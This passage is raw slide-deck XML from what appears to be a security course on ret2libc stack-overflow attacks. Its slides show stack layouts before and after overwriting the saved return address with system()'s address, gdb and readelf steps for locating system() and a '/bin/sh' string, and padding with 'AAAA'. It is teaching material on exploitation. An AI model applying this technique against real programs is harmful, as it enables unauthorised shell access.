            <a:off x="9369055" y="2822192"/>
            <a:ext cx="228652" cy="259080"/>
            <a:chOff x="7768855" y="2288792"/>
            <a:chExt cx="228652" cy="259080"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="738" name="Google Shape;738;g24e5311e72c_0_59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68855" y="2431092"/>
              <a:ext cx="228652" cy="1165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9" name="Google Shape;739;g24e5311e72c_0_598"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7768855" y="2288792"/>
              <a:ext cx="228600" cy="259080"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="259080" w="228600">
                  <a:moveTo>
                    <a:pt x="228600" y="170873"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="216004" y="142061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180724" y="117020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126519" y="97618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="85723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="54357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="28575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126519" y="40469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180723" y="59871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216004" y="84912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228599" y="113725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="170873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220434" y="194252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161644" y="233059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115378" y="246810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60770" y="255675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="258816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="201666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56926" y="198902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109139" y="190998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154507" y="178540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190902" y="162112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216196" y="142298"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="25400">
              <a:solidFill>
                <a:srgbClr val="0AD4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0" name="Google Shape;740;g24e5311e72c_0_598"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9390451" y="3568109"/>
            <a:ext cx="414654" cy="2565400"/>
            <a:chOff x="7790251" y="3034709"/>
            <a:chExt cx="414654" cy="2565400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="741" name="Google Shape;741;g24e5311e72c_0_598"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7790251" y="3034710"/>
              <a:ext cx="414654" cy="1276350"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1276350" w="414654">
                  <a:moveTo>
                    <a:pt x="5847" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="103601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23634" y="105562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46929" y="111378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92359" y="134156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135995" y="171106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177546" y="221402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216720" y="284215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235324" y="320056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253223" y="358716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270383" y="400092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286764" y="444078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302333" y="490573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317050" y="539473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330881" y="590673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343789" y="644071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355737" y="699563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366688" y="757046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376606" y="816416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385454" y="877569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393196" y="940402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399796" y="1004811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405216" y="1070694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409421" y="1137946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412373" y="1206464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414036" y="1276144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414385" y="1208951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413517" y="1142554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411461" y="1077049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408248" y="1012534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403907" y="949106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398470" y="886862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391966" y="825900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384426" y="766317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375880" y="708210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366358" y="651675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355890" y="596812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344506" y="543716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332238" y="492484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319114" y="443215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="305166" y="396006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290423" y="350952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274916" y="308153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258675" y="267705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241730" y="229704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224111" y="194250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186975" y="131366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147507" y="79831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105949" y="40422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62544" y="13918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17533" y="1096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11692" y="364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5847" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000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g24e5311e72c_0_598"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7790251" y="3034709"/>
              <a:ext cx="414654" cy="2565400"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2565400" w="414654">
                  <a:moveTo>
                    <a:pt x="414406" y="1224344"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="413798" y="1290982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411989" y="1356836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409010" y="1421797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404886" y="1485761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399648" y="1548620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393321" y="1610267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385935" y="1670597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377517" y="1729503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368096" y="1786878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357698" y="1842615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346352" y="1896609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334086" y="1948753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320928" y="1998941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="306906" y="2047065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292047" y="2093019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276380" y="2136698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259932" y="2177994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242732" y="2216801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224807" y="2253012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206185" y="2286521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166963" y="2345007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125288" y="2391408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103601" y="2409809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103602" y="2358007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2500487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103602" y="2565212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103602" y="2513411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146418" y="2473373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186894" y="2420823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224807" y="2356613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242732" y="2320401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259932" y="2281594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276380" y="2240298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292047" y="2196620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="306906" y="2150665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320928" y="2102541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334086" y="2052354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346352" y="2000210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357698" y="1946216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368096" y="1890478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377518" y="1833103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385935" y="1774198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393321" y="1713868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399648" y="1652220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404887" y="1589362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409010" y="1525398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411989" y="1460437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413798" y="1394583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414407" y="1327945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414406" y="1224344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413750" y="1154867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411806" y="1086407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408607" y="1019068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404190" y="952952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398589" y="888163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391840" y="824804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383976" y="762978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375034" y="702790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365048" y="644341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354053" y="587737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342084" y="533079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329176" y="480472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315365" y="430018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300685" y="381821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285170" y="335985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268857" y="292612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251780" y="251807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233974" y="213672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215474" y="178311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176531" y="116324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135233" y="66672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91858" y="30183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46687" y="7683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="103602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23634" y="105563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46929" y="111378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92358" y="134156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135995" y="171107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177546" y="221403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216719" y="284216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235323" y="320057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253223" y="358717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270382" y="400092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286764" y="444079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302332" y="490574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317049" y="539473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330880" y="590674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343788" y="644072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355736" y="699564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366687" y="757047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376605" y="816417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385453" y="877570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393196" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399795" y="1004812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405216" y="1070695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409420" y="1137947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412372" y="1206465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414035" y="1276145"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="25375">
              <a:solidFill>
                <a:srgbClr val="0AD4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4e5311e72c_0_617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Inside system() after attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="749" name="Google Shape;749;g24e5311e72c_0_617"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="905725" y="1273150"/>
            <a:ext cx="10515600" cy="63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Expectation             vs           reality</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="750" name="Google Shape;750;g24e5311e72c_0_617"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3809998" y="1987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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1392550"/>
              </a:tblGrid>
              <a:tr h="206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Stack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4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2575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="377825" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="9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7964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2575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="311150" rtl="0" algn="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Saved EIP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2575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="311150" rtl="0" algn="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4F81B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Saved EBP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2575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="263525" rtl="0" algn="r">
                        <a:lnSpc>
                          <a:spcPct val="9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Local variables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5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5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5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64150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="269240" rtl="0" algn="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 Library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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="751" name="Google Shape;751;g24e5311e72c_0_617"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2734248" y="2090228"/>
            <a:ext cx="8643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76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0xfffffffc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64160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2" name="Google Shape;752;g24e5311e72c_0_617"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2692331" y="5752103"/>
            <a:ext cx="8643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92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0x00000000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53" name="Google Shape;753;g24e5311e72c_0_617"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7296150" y="2012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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1690375"/>
              </a:tblGrid>
              <a:tr h="206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Stack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215900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5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Command Address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E46C0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AAAA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173990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System() address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215900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Local variables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5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5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64150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="509269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 Library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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="754" name="Google Shape;754;g24e5311e72c_0_617"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6363273" y="2115654"/>
            <a:ext cx="864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9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0xfffffffc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64160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5" name="Google Shape;755;g24e5311e72c_0_617"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6321356" y="5739745"/>
            <a:ext cx="8643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92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0x00000000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24e5311e72c_0_630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Ret2libc requirements</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="762" name="Google Shape;762;g24e5311e72c_0_6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Address of system()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command string we want to execute in memory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“/bin/sh”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Address of the command string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24e5311e72c_0_636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Ret2libc Requirements</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="769" name="Google Shape;769;g24e5311e72c_0_63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Address of system()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Static i.e. same for every program that uses the C Library*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Find using debugger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gdb vulnProgram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(gdb) break main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(gdb) run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(gdb) p system // Finds the address of system()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24e5311e72c_0_642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Ret2libc Requirements</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="776" name="Google Shape;776;g24e5311e72c_0_642"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="7953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Command string and its address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Lets use “/bin/sh” as our command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Three options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Export environment variable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$ export cmd=”/bin/sh\x00”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getEnvAddr cmd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Inject as part of our exploit inside the file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craft it in python script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Find string in libc or other library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readelf -x ‘rodata’ /lib/i386-linux-gnu/libc.so.6 | grep “/bin/sh”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Not always available</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="777" name="Google Shape;777;g24e5311e72c_0_642"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10204450" y="17081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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1524000"/>
              </a:tblGrid>
              <a:tr h="67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Null Word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4061"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="45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Program Name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3735"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="67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Environment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7933C"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="462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Arguments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04A7B"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2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Stack Frame 1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Stack Frame 2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Stack Frame N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</a:tr>
              <a:tr h="73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80645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5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sp>
        <p:nvSpPr>
          <p:cNvPr id="778" name="Google Shape;778;g24e5311e72c_0_642"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10411371" y="1497285"/>
            <a:ext cx="11232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Stack Memory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9" name="Google Shape;779;g24e5311e72c_0_642"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8978825" y="2365965"/>
            <a:ext cx="9405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0xbffffffc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0" name="Google Shape;780;g24e5311e72c_0_642"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9016931" y="5582879"/>
            <a:ext cx="8643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0x00000000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e5311e72c_0_18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g24e5311e72c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447" y="1365865"/>
            <a:ext cx="2244677" cy="1974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24e5311e72c_0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66750" y="1620500"/>
            <a:ext cx="2477271" cy="139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24e5311e72c_0_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563" y="3810000"/>
            <a:ext cx="2112538" cy="1406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24e5311e72c_0_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44175" y="4616415"/>
            <a:ext cx="28194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24e5311e72c_0_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5710" y="3809993"/>
            <a:ext cx="2583794" cy="18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24e5311e72c_0_654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Before and After ret2libc attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="787" name="Google Shape;787;g24e5311e72c_0_654"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3276598" y="16700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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1392550"/>
              </a:tblGrid>
              <a:tr h="206375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="109220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Stack (Before)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4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2575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="318770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E46C0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&amp;fileName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2575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="318770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saved EIP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2575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="318770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saved EBP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2575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="234950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filePointer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53375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="276860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dataBuffer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53375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="276860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dataBuffer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53375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="276860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dataBuffer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2575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="276860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dataBuffer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2575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="276860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dataBuffer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64150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="360680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 Library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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="788" name="Google Shape;788;g24e5311e72c_0_654"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2200848" y="1772728"/>
            <a:ext cx="8643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76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0xfffffffc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64160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9" name="Google Shape;789;g24e5311e72c_0_654"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991264" y="4791807"/>
            <a:ext cx="11994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Hint address-&gt;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0" name="Google Shape;790;g24e5311e72c_0_654"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2158931" y="5422872"/>
            <a:ext cx="8643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92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0x00000000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91" name="Google Shape;791;g24e5311e72c_0_654"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5276850" y="16827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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1842775"/>
              </a:tblGrid>
              <a:tr h="206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Stack (After)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5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command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5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Command Address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E46C0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AAAA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System() Address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AAAA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AAAA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5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AAAA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5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AAAA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AAAA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AAAA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AAAA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64150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="8382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 Library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2" name="Google Shape;792;g24e5311e72c_0_654"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
